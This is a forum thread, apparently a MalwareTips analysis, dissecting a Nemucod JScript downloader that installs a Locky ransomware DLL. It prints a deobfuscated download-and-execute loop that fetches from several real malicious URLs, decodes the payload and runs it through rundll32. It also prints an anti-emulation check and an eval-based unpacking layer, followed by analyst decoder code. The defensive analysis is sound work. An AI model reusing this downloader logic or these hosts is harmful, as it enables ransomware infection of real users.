Io[214] = 9555;
Io[215] = 9579;
Io[216] = 9578;
Io[217] = 9496;
Io[218] = 9484;
Io[-1894 + 2113] = 9608;
Io[220] = 9604;
Io[221] = 9612;
Io[222] = 9616;
Io[6075 - 5852] = 9600;
Io[224] = 945;
Io[31 * 7 + 8] = 223;
Io[78 * 2 + 70] = 915;
Io[94 * 2 + 39] = 960;
Io[228] = 931;
Io[229] = 963;
Io[230] = -7149 + 7330;
Io[231] = 964;
Io[232] = 934;
Io[3 * 77 + 2] = 300 * 3 + 20;
Io[234] = 937;
Io[66 * 3 + 37] = 7499 - 6551;
Io[103 * 2 + 30] = 8734;
Io[2060 - 1823] = 966;
Io[238] = 949;
Io[239] = 8745;
Io[240] = 8801;
Io[9305 - 9064] = -8709 + 8886;
Io[242] = 8805;
Io[5598 - 5355] = 15170 - 6366;
Io[-950 + 1194] = 6040 + 2952;
Io[245] = 8993;
Io[7624 - 7378] = 247;
Io[247] = 8776;
Io[-8782 + 9030] = 6192 - 6016;
Io[249] = 8729;
Io[250] = 183;
Io[251] = 4944 + 3786;
Io[252] = 8319;
Io[-3209 + 3462] = 178;
Io[94 * 2 + 66] = 9632;
Io[255] = 160;

var GLq = new Array();
var Gr = "";
var Lj4;
var El;
for (var Lp9 = 0; Lp9 < JEc3[ETi8 + Fp]; Lp9++) {
Lj4 = JEc3[Lp9];
if (Lj4 < (9915 - 9787)) {
El = Lj4;
} else {
El = Io[Lj4];
}
GLq.push(String[GPe8 + NEh0 + St2 + VUe5](El));
}

Gr = GLq[GPy]("");

return Gr;
};

function IGi2(Nq, JEc3) {
var QAl8 = WScript[Cd + Jz + GNu0](Ma7 + Gv7 + NIo1 + YSd7 + Da7 + Sq1);
QAl8[WKs3] = AJf;
QAl8[Lf + XQg1 + Kp] = Hn;
QAl8[Wb]();
QAl8[Py + DLg](Kx1(JEc3));
QAl8[KIy6 + Cz + Gh5](Nq, 2);

QAl8[Ab + TRf]();

};
(Modified to avoid copy-paste => run => infected ! :D)
You can recognize some parts :


https://malwaretips.com/threads/war...downloader-nemucod-july-28.61796/#post-532040


Same general method / functions :rolleyes:

4) Differences :

- New Locky ransomware version delivered as DLL

See @Solarquest thread
Virus Alert - New Locky ransomware version delivered as DLL

- uses the ShortPath Property
=> returns the short path used by programs that require the earlier 8.3 file naming convention.
%TEMP%\OOSNSG~1.DLL
Payload obfuscated / deobfuscated :

Same methods / functions used to deobfuscate the payload.

%TEMP%\ooSnsgsGcGgw

=> ooSnsgsGcGgw.dll once correctly deobfuscated

Example : "C:\Users\DardiM\AppData\Local\Temp\ooSnsgsGcGgw.dll"

With ShortPath Property :

=> %TEMP%\OOSNSG~1.DLL
New part (because it now uses a DLL):

if (Vu(SIq + Ex1 + HYu2 + Ht0 + JBs8 + DEa + HSu1).toLowerCase() == "amd64") {
var UFn4 = Xl3.ExpandEnvironmentStrings(NLq);
} else {
var UFn4 = Xl3.ExpandEnvironmentStrings(Mi0);
}

=> it checks the processor architecture to call the right rundll32.exe.

'C:\WINDOWS\SysWOW64\rundll32.exe'
or
"%SystemRoot%\\system32\\rundll32.exe"
is used

5) URLs :

hxxp://212.26.129.68/v07t7cb
hxxp://aquatixbottle.com/g40yg2
hxxp://realm-of-rage.heimat.eu/ut1s5
hxxp://essenciadoequilibrio.net/slfhspe
hxxp://sopranolady7.wang/2ictp

6) The payload

New Locky version.

run => rundll32.exe %TEMP%\OOSNSG~1.DLL,qwerty 323

Remember : => it uses the short path used by programs that require the earlier 8.3 file naming convention.

%TEMP%\OOSNSG~1.DLL
for
"%TEMP%\ooSnsgsGcGgw.dll"
As seen in my previous analyses of the Nemucod family, the payload is obfuscated when downloaded, and the script uses functions to decipher / decode (XOR) it and make it a real dangerous file: a DLL in this latest version.

I can't re-explain all the steps done to deobfuscate the payload, so I put here the posts, for people that didn't read them (complete explanations, deobfuscated samples, etc.)

https://malwaretips.com/threads/new...y-mail-js-trojandownloader-nemucod-ajp.61375/

https://malwaretips.com/threads/war...nt-js-trojandownloader-nemucod-july-28.61796/

https://malwaretips.com/threads/war...downloader-nemucod-july-28.61796/#post-528339

https://malwaretips.com/threads/war...downloader-nemucod-july-28.61796/#post-532040

It looks like the spoiler below, with some other var names
(in the original post: in red the important modifications, in blue bold the main loop)
var tab_methods = ["MSXML2.XMLHTTP", "WinHttp.WinHttpRequest.5.1"];
for (var index = 0; index < tab_methods.length; index++) {
try {
var oHttp = WScript.CreateObject(tab_methods[index]);
break;
} catch (e) {
continue;
}
};

urls_tab = [
"hxxp://212.26.129.68/v07t7cb",
"hxxp://aquatixbottle.com/g40yg2",
"hxxp://realm-of-rage.heimat.eu/ut1s5",
"hxxp://essenciadoequilibrio.net/slfhspe",
"hxxp://sopranolady7.wang/2ictp"

];

var TIk = uheprng(Math.random().toString());
var Lp9 = 1;

do {
var Gr = TIk(urls_tab.length); //
try {

if (1 == Lp9) {
oHttp.open("GET", urls_tab[Gr++ % urls_tab.length], false);
oHttp.send();
}
if (oHttp.readystate < 4) {

WScript.Sleep(0);
continue;
}
var oStream = WScript.CreateObject("ADODB.Stream");
oStream.open();
oStream.type = 1;
oStream.write(oHttp.responseBody);
oStream.position = 0;
oStream.saveToFile(file_path, 2);
oStream.close();
var file_content = ReadTextFromFile_char_substitution_1(file_path);
file_content = deobfuscation(file_content);

if (file_content.length < 100 * 1024 || file_content.length > 230 * 1024 || ! is_real_exe_file(file_content)) {
Lp9 = 1;
continue;
}
try {

WriteTextToFile_char_substitution_2(exe_file_path, file_content);
} catch (e) {
break;
};
oShell.Run(cmd_command_line + ",qwerty 323");
break;
} catch (e) {

WScript.Sleep(1000);
continue;
};
} while (Lp9);
WScript.Quit(0);

// Functions used
function uheprng(UFn4) {

return (function() {
var seed = UFn4;
var o = 48,
c = 1,
p = o,
s = new Array(o);
var i, j;
var base64chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
var mash = Mash();
for (i = 0; i < o; i++) s = mash(seed);
mash = null;
var random = function(range) {
return Math.floor(range * (rawprng() + (rawprng() * 0x200000 | 0) * 1.1102230246251565e-16));
}
function rawprng() {

if (++p >= o) p = 0;
var t = (1759680 + 9183) * s[p] + c * 2.3283064365386963e-10;
return s[p] = t - (c = t | (0));
}
return random;
}());
};

function Mash() {

var n = 0xefc8249d;
var mash = function(data) {
if (data) {

data = data.toString();
for (var i = 0; i < data.length; i++) {
n += data.charCodeAt(i);
var h = 0.02519603282416938 * n;
n = h >>> 0;
h -= n;
h *= n;
n = h >>> 0;
h -= n;
n += h * 0x100000000;
}
return (n >>> 0) * 2.3283064365386963e-10;
} else n = 0xefc8249d;
};
return mash;
}

function deobfuscation(file_content) {

var Nf;
var NQf6 = uheprng(
753887);
for (var index = 0; index < file_content.length; index++) {
file_content[index] ^= NQf6(256);
}
var XWe = file_content[file_content.length - 4] | file_content[file_content.length - 3] << 8 | file_content[file_content.length - 2] << 16 | file_content[file_content.length - 1] << 24;
file_content.splice(file_content.length - 4, 4);
Nf = 2;
for (var index = 0; index < file_content.length; index++) {

Nf = (Nf + file_content[index]) % 0x100000000;
};
if (Nf != XWe) {

return [];
};
return file_content;
};

function is_real_exe_file(file_content) {

if (file_content[0] == 0x4D && file_content[1] == 0x5a) { //"MZ"
return true;
} else {
return false;
}
};

function ReadTextFromFile_char_substitution_1(file_path) {

var oStream = WScript.CreateObject("ADODB.Stream");
oStream.type = 2;
oStream.Charset = "437";
oStream.open();
oStream.LoadFromFile(file_path);
var file_content = oStream.Readtext;
oStream.close();
return char_substitution_1(file_content);
};

function char_substitution_1(file_content) {
var ELs = new Array();

ELs[199] = 128;
ELs[252] = 129;
...
...
ELs[8319] = 252;
ELs[178] = 253;
ELs[9632] = 254;
ELs[160] = 255;

var new_content = new Array();
for (var index = 0; index < file_content.length; index++) {

var char_code = file_content.charCodeAt(index);
if (char_code < 128) {
var new_char_code = char_code;
} else {
var new_char_code = ELs[char_code];
}
new_content.push(new_char_code);
};
return new_content;
};

function char_substitution_2(file_content) {

var HFw3 = new Array();
HFw3[128] = 199;
HFw3[129] = 252;
...
...
HFw3[254] = 9632;
HFw3[255] = 160;

var Ww = new Array();
var result = "";
var char_code;
var new_char_code;
for (var index = 0; index < file_content.length; index++) {
char_code = file_content[index];
if (char_code < 128) {

new_char_code = char_code;
} else {
new_char_code = HFw3[char_code];
}

Ww.push(String.fromCharCode(new_char_code));
}
result = Ww.join("");
return result;
};

function WriteTextToFile_char_substitution_2(exe_file_path, file_content) {

var oStream = WScript.CreateObject("ADODB.Stream");
oStream.type = 2;
oStream.Charset= "437" ;
oStream.open();
oStream.WriteText(char_substitution_2(file_content));
oStream.SaveToFile(exe_file_path, 2);
oStream.close();
};
https://malwaretips.com/threads/war...downloader-nemucod-july-28.61796/#post-528138
and all posts below, in the above link
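The payload checks described above (XOR with the uheprng keystream, the 4-byte checksum trailer, the MZ header and the size bounds), as an added analyst's reimplementation that is not code from the original post or from the sample. The keystream generator is Gibson's public uheprng, which the sample embeds under that name; the seed, the checksum start value and the demo bytes are constructed for this example, and the encoder exists only to build the test blob.

```javascript
// Added example (not from the original post or the sample): clean-room
// reimplementation of the checks the Nemucod loop runs on a downloaded blob.
// Seed, checksum start value and demo bytes are constructed, not live values.

// Mash string hasher (same constants as the public uheprng / the sample).
function Mash() {
  let n = 0xefc8249d;
  return function (data) {
    data = data.toString();
    for (let i = 0; i < data.length; i++) {
      n += data.charCodeAt(i);
      let h = 0.02519603282416938 * n;
      n = h >>> 0;
      h -= n;
      h *= n;
      n = h >>> 0;
      h -= n;
      n += h * 0x100000000;
    }
    return (n >>> 0) * 2.3283064365386963e-10;
  };
}

// uheprng(seed) -> random(range): deterministic integers in [0, range).
// The pasted copy in the thread reads "s = mash(seed)"; the generator needs s[i].
function uheprng(seed) {
  const o = 48;
  const s = new Array(o);
  let c = 1, p = o;
  let mash = Mash();
  for (let i = 0; i < o; i++) s[i] = mash(seed);
  mash = null;
  function rawprng() {
    if (++p >= o) p = 0;
    const t = 1768863 * s[p] + c * 2.3283064365386963e-10;
    return (s[p] = t - (c = t | 0));
  }
  return function (range) {
    return Math.floor(range * (rawprng() + ((rawprng() * 0x200000) | 0) * 1.1102230246251565e-16));
  };
}

// Mirror of the sample's deobfuscation(): XOR each byte with the keystream,
// then require that the trailing 4 bytes (little-endian) equal the byte sum of
// the rest, started at checksumInit, modulo 2^32. Mismatch -> [] and the loop
// moves on to the next URL. (The sample compares the trailer as a signed
// int32; ">>> 0" keeps the comparison right when the top bit is set.)
function decodePayload(bytes, seed, checksumInit) {
  const ks = uheprng(seed);
  const buf = bytes.map((b) => b ^ ks(256));
  const n = buf.length;
  if (n < 4) return [];
  const stored = (buf[n - 4] | (buf[n - 3] << 8) | (buf[n - 2] << 16) | (buf[n - 1] << 24)) >>> 0;
  const body = buf.slice(0, n - 4);
  let sum = checksumInit;
  for (const b of body) sum = (sum + b) % 0x100000000;
  return sum === stored ? body : [];
}

// Inverse direction, used only to build a test blob: append the checksum
// trailer, then XOR with the same keystream.
function encodePayload(body, seed, checksumInit) {
  let sum = checksumInit;
  for (const b of body) sum = (sum + b) % 0x100000000;
  const trailer = [sum & 0xff, (sum >>> 8) & 0xff, (sum >>> 16) & 0xff, (sum >>> 24) & 0xff];
  const ks = uheprng(seed);
  return body.concat(trailer).map((b) => b ^ ks(256));
}

// is_real_exe_file(): the first two bytes must be "MZ".
function isRealExeFile(bytes) {
  return bytes.length >= 2 && bytes[0] === 0x4d && bytes[1] === 0x5a;
}

// The loop's accept rule: 100 KiB <= size <= 230 KiB and an MZ header.
function acceptsPayload(decoded) {
  return decoded.length >= 100 * 1024 && decoded.length <= 230 * 1024 && isRealExeFile(decoded);
}

const DEMO_SEED = 424242;     // constructed (the readable script shows its own seed)
const DEMO_CHECKSUM_INIT = 2; // constructed (the script derives it from a string length)

// Constructed stand-in for the DLL: MZ header plus filler, sized inside the bounds.
function demoBody() {
  const body = new Array(120 * 1024).fill(0x90);
  body[0] = 0x4d; body[1] = 0x5a;
  return body;
}

// Round trip a constructed blob, then show that one flipped bit in the body
// makes the checksum reject it (the loop would then retry another URL).
function demoRoundTrip() {
  const blob = encodePayload(demoBody(), DEMO_SEED, DEMO_CHECKSUM_INIT);
  const decoded = decodePayload(blob, DEMO_SEED, DEMO_CHECKSUM_INIT);
  const tampered = blob.slice();
  tampered[1000] ^= 0x01;
  const rejected = decodePayload(tampered, DEMO_SEED, DEMO_CHECKSUM_INIT);
  return { accepted: acceptsPayload(decoded), tamperedRejected: rejected.length === 0 };
}
```

Calling demoRoundTrip() returns { accepted: true, tamperedRejected: true }; feeding it a real captured blob only makes sense with the seed and start value recovered from the specific script.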
 

SHvFl (Level 35, joined Nov 19, 2014, 2,342 posts)
Lol, I get such mails all the time on one of my emails. The benefit of having an old account with some history behind it.
I am amazed people actually open the random crap they send them tbh, which I assume they do or else malware people would stop mass emailing.

Thanks for the analysis buddy.
 

Exterminator (Community Manager, Staff Member, joined Oct 23, 2012, 12,527 posts)
Please we can do without stuff containing foul language.
The rules forbidding the use of foul language apply to everybody as well as everything and anything posted in the forum.
This includes quoted text, videos, images and articles.
Thanks :)

*This is in reference to a deleted post that contained an example with extremely foul language.
 

DardiM (thread author)
Please we can do without stuff containing foul language.
The rules forbidding the use of foul language apply to everybody as well as everything and anything posted in the forum.
Thanks :)
Sorry :)

Lol, I get such mails all the time on one of my emails. The benefit of having an old account with some history behind it.
I am amazed people actually open the random crap they send them tbh, which I assume they do or else malware people would stop mass emailing.

Thanks for the analysis buddy.

In less than 7 days :

- Attached is the list of old office facilities that need to be replaced. Please copy the list into the purchase order form.

- Here is the travel expense sheet for your upcoming company field trip. Please write down the approximate costs in the attachment.


- Attached is the bank transactions made from the company during last month.

- Please file these transactions into financial record.

- Please sign the attached purchase of the office equipment. We will send you back the receipt afterward.

- Hello, as you requested, attached is the paycheck for your next months salary in advance.
=> my favourite :rolleyes:


Here is the softened post :)

A sample I received that is similar to the sample analyzed in this thread, but with a big insult that I replaced with shutBIG_INSULT_INSIDE:

function d(){
    // Anti-emulation check: WshShell.Environment("SYSTEM") returns the raw,
    // unexpanded registry value of ComSpec. On a real Windows that value is
    // "%SystemRoot%\system32\cmd.exe"; anything else (emulator, non-Windows
    // sandbox) makes the script quit before it does anything.
    var _wds = "W"+"S"+"c"+"r"+"ipt";
    var _c = "\%S"+"y"+"st"+"em"+"Root\%\\system32\\cmd."+"ex"+"e";
    var _zds = this[_wds]["C"+"re"+"ateObject"](_wds+".Shell");
    var se = _zds["E"+"n"+"vi"+"ronmen"+"t"]("S"+"Y"+"S"+"T"+"EM");
    var _dd = se("Co"+"mS"+"pe"+"c");
    if (_dd == _c) {return 1;}
    else {WScript["Q"+"u"+"it"](1);};
}
d();

var As2 = "LbshutBIG_INSULT_INSIDERfshutBIG_INSULT_INSIDENEbshutBIG_INSULT_INSIDEHOx7shutBIG_INSULT_INSIDECk3shutBIG_INSULT_INSIDEUHoshutBIG_INSULT_INSIDESwshutBIG_INSULT_INSIDENEbshutBIG_INSULT_INSIDEXlshutBIG_INSULT_INSIDELYk5shutBIG_INSULT_INSIDEIJdshutBIG_INSULT_INSIDEYi6shutBIG_INSULT_INSIDEFwshutBIG_INSULT_INSIDENcshutBIG_INSULT_INSIDEXlshutBIG_INSULT_INSIDEXlshutBIG_INSULT_INSIDEXlshutBIG_INSULT_INSIDEXlshutBIG_INSULT_INSIDEBZbshutBIG_INSULT_INSIDEVdshutBIG_INSULT_INSIDEPj2shutBIG_INSULT_INSIDEXlshutBIG_INSULT_INSIDENgshutBIG_INSULT_INSIDEAPzshutBIG_INSULT_INSIDELYk5shutBIG_INSULT_INSIDENsshutBIG_INSULT_INSIDEXlshutBIG_INSULT_INSIDETx7shutBIG_INSULT_INSIDEXlshutBIG_INSULT_INSIDELeshutBIG_INSULT_INSIDEBDx7shutBIG_INSULT_INSIDELeshutBIG_INSULT_INSIDEZh4shutBIG_INSULT_INSIDELeshutBIG_INSULT_INSIDENVmshutBIG_INSULT_INSIDELeshutBIG_INSULT_INSIDEZh4shutBIG_INSULT_INSIDELeshutBIG_INSULT_INSIDEHOx7shutBIG_INSULT_INSIDELeshutBIG_INSULT_INSIDEZh4shutBIG_INSULT_INSIDELeshutBIG_INSULT_INSIDEPj2shutBIG_INSULT_INSIDELeshutBIG_INSULT_INSIDEZh4shutBIG_INSULT_INSIDELeshutBIG_INSULT_INSIDEUHoshutBIG_INSULT_INSIDEGNp9shutBIG_INSULT_INSIDECk3shutBIG_INSULT_INSIDELeshutBIG_INSULT_INSIDERushutBIG_INSULT_INSIDENcshutBIG_INSULT_INSIDEXlshutBIG_INSULT_INSIDEXlshutBIG_INSULT_INSIDE
...
...
...
".split("shutBIG_INSULT_INSIDE");

var As2 is similar to the first char table we saw in the first post, and the .split function removes the insult part.

It also uses a second table of chars to replace the "hidden" chars of the first table:

var Tr0 = {"Nc": "\x0a", "UXg3": "\x0d", "OEq": "D", "Ug6": "H", "Jg9": "L", "Ii": "P", "Ap": "T", "ASy5": "X", "Nl2": "\x09", "LYk5": "d", "Mu8": "h", "Ly": "l", "GNp9": "p", "Ck3": "t", "Ue": "\x7d", "Qs": "\x7c", "Fw": "\x7b", "Pw2": "\x2f", "MQl": "\x2d", "Qf2": "\x2e", "Zh4": "\x2b", "Gu3": "\x2c", "Bi": "\x2a", "KVj7": "C", "DLr7": "G", "Qd0": "K", "Cx": "O", "NYt": "\x26", "NVm": "S", "XOq0": "\x25", "Le": "\x22", "Xl": "\x20", "PYc": "x", "IJd": "\x28", "Yi6": "\x29", "HOx7": "c", "Ja2": "g", "XBh": "k", "Sw": "o", "Ns": "s", "APz": "w", "BDx7": "W", "SJj": "\x21", "Zt": "\x31", "GRc7": "\x30", "QIb": "\x33", "GXo7": "\x32", "FCw": "\x35", "XEp": "\x34", "DBa4": "\x37", "Pr": "\x36", "Kj": "\x39", "Rn": "\x38", "Le6": "\x3a", "LAo4": "\x3c", "Ru": "\x3b", "Qp7": "\x3e", "Tx7": "\x3d", "Gc": "F", "Hv0": "J", "Jj": "N", "Ib3": "R", "Dt1": "V", "OEi": "Z", "YZc": "b", "Lb": "f", "Dy2": "j", "NEb": "n", "Pj2": "r", "BZb": "v", "Pt": "z", "Fk": "B", "Rf": "u", "Op": "A", "DRu": "E", "So2": "I", "TOy": "M", "XGx6": "Q", "Ee": "U", "ZVy": "Y", "Vd": "a", "No": "e", "UHo": "i", "Fv3": "m", "Og": "q", "Ng": "\x5f", "Ue0": "\x5e", "MHz2": "\x5d", "Ji7": "\x5c", "XDq": "\x5b", "Ya2": "y"};
var BIz = "";   // accumulator for the decoded code (assumed; its declaration is not in the excerpt shown)
var Fv;
for (Fv in As2)
{
    // each token of As2 is replaced by its character from Tr0
    BIz = BIz + Tr0[As2[Fv]];
}
eval(BIz);   // runs the decoded stage; for analysis, replace eval with WScript.Echo to dump it instead


=> BIz will contain the code after the first deobfuscation step.

For the other part: like the sample analyzed in this thread, with more "tricks" to obfuscate some parts a bit more (for example the XOR part).

URLs :

http: //virmalw.name/2lbbr
http: //www .vissershuisje-bredene.be/fisg4
http: //www .mediawareonline.it/ediuv66v
http: //foodbiz-net.com/82zppv
http: //www .smoes.net/vrjhlrj7

Payload :

GKmJaoh4VHxYOk.dll



N.B. : The script maker has a bad vocabulary :D
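The As2 / Tr0 layer above is a pure token substitution, so it can be undone statically instead of letting the script eval(BIz). Here is an added example, written by the editor and not taken from the sample or from the author: it pulls the packed string, its split() separator and the token table out of the script text, rebuilds BIz offline, and keeps unknown tokens visible instead of silently turning them into "undefined". The script excerpt it runs on is constructed from what the page shows: the visible prefix of As2 (the string is cut with "..." on the page, and the visible part ends on a separator) and the full Tr0 table as listed above. Decoding that prefix gives the beginning of the same anti-emulation function d() that the sample starts with.

```python
"""Static decoder for the As2 / Tr0 stage-1 layer.

Added example (analyst's code, not the sample's own and not the author's).
"""
import ast
import re

SEPARATOR = "shutBIG_INSULT_INSIDE"  # the author's placeholder for the insult used as separator

# Visible prefix of As2 as listed on the page, one token per element.
AS2_PREFIX_TOKENS = [
    "Lb", "Rf", "NEb", "HOx7", "Ck3", "UHo", "Sw", "NEb", "Xl", "LYk5", "IJd",
    "Yi6", "Fw", "Nc", "Xl", "Xl", "Xl", "Xl", "BZb", "Vd", "Pj2", "Xl", "Ng",
    "APz", "LYk5", "Ns", "Xl", "Tx7", "Xl", "Le", "BDx7", "Le", "Zh4", "Le",
    "NVm", "Le", "Zh4", "Le", "HOx7", "Le", "Zh4", "Le", "Pj2", "Le", "Zh4",
    "Le", "UHo", "GNp9", "Ck3", "Le", "Ru", "Nc", "Xl", "Xl",
]

# Tr0 exactly as it appears in the sample; JScript's "\x.." escapes are valid Python too,
# so the literal can be handed to ast.literal_eval unchanged.
TR0_LITERAL = r'''{"Nc": "\x0a", "UXg3": "\x0d", "OEq": "D", "Ug6": "H", "Jg9": "L", "Ii": "P",
"Ap": "T", "ASy5": "X", "Nl2": "\x09", "LYk5": "d", "Mu8": "h", "Ly": "l", "GNp9": "p",
"Ck3": "t", "Ue": "\x7d", "Qs": "\x7c", "Fw": "\x7b", "Pw2": "\x2f", "MQl": "\x2d",
"Qf2": "\x2e", "Zh4": "\x2b", "Gu3": "\x2c", "Bi": "\x2a", "KVj7": "C", "DLr7": "G",
"Qd0": "K", "Cx": "O", "NYt": "\x26", "NVm": "S", "XOq0": "\x25", "Le": "\x22", "Xl": "\x20",
"PYc": "x", "IJd": "\x28", "Yi6": "\x29", "HOx7": "c", "Ja2": "g", "XBh": "k", "Sw": "o",
"Ns": "s", "APz": "w", "BDx7": "W", "SJj": "\x21", "Zt": "\x31", "GRc7": "\x30", "QIb": "\x33",
"GXo7": "\x32", "FCw": "\x35", "XEp": "\x34", "DBa4": "\x37", "Pr": "\x36", "Kj": "\x39",
"Rn": "\x38", "Le6": "\x3a", "LAo4": "\x3c", "Ru": "\x3b", "Qp7": "\x3e", "Tx7": "\x3d",
"Gc": "F", "Hv0": "J", "Jj": "N", "Ib3": "R", "Dt1": "V", "OEi": "Z", "YZc": "b", "Lb": "f",
"Dy2": "j", "NEb": "n", "Pj2": "r", "BZb": "v", "Pt": "z", "Fk": "B", "Rf": "u", "Op": "A",
"DRu": "E", "So2": "I", "TOy": "M", "XGx6": "Q", "Ee": "U", "ZVy": "Y", "Vd": "a", "No": "e",
"UHo": "i", "Fv3": "m", "Og": "q", "Ng": "\x5f", "Ue0": "\x5e", "MHz2": "\x5d", "Ji7": "\x5c",
"XDq": "\x5b", "Ya2": "y"}'''

# Constructed script excerpt with the same layout as the sample (only the shape matters).
SCRIPT_EXCERPT = (
    'var As2 = "' + SEPARATOR.join(AS2_PREFIX_TOKENS) + SEPARATOR
    + '".split("' + SEPARATOR + '");\n'
    + "var Tr0 = " + TR0_LITERAL + ";\n"
    + "var Fv;\nfor (Fv in As2)\n{\nBIz = BIz + Tr0[As2[Fv]];\n}\neval(BIz);\n"
)

SPLIT_RE = re.compile(r'var\s+(\w+)\s*=\s*"([^"]*)"\.split\("([^"]*)"\)\s*;')
TABLE_RE = re.compile(r'var\s+(\w+)\s*=\s*(\{[^}]*\})\s*;')


def extract_layer(script):
    """Find the packed string, its separator and the token table in the script text."""
    m = SPLIT_RE.search(script)
    if m is None:
        raise ValueError('no var X = "...".split("...") statement found')
    _name, packed, separator = m.groups()
    t = TABLE_RE.search(script)
    if t is None:
        raise ValueError("no token table found")
    table = ast.literal_eval(t.group(2))  # dict literal; the \x escapes are decoded here
    return packed.split(separator), table


def decode_tokens(tokens, table):
    """Rebuild BIz. Unknown tokens stay visible instead of becoming 'undefined'."""
    out = []
    for tok in tokens:
        if tok == "":
            # empty token from a trailing separator; JScript would append "undefined" here
            continue
        out.append(table.get(tok, "<?" + tok + "?>"))
    return "".join(out)


def decode_stage1(script):
    tokens, table = extract_layer(script)
    return decode_tokens(tokens, table)


if __name__ == "__main__":
    print(decode_stage1(SCRIPT_EXCERPT))
```

On a full sample the same two regexes pick up the real As2 line; the decoded text is the next layer, which is then read rather than executed. The `<?token?>` markers show where a table entry is missing, which is how a partially captured script or a typo in a transcribed table shows up.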
 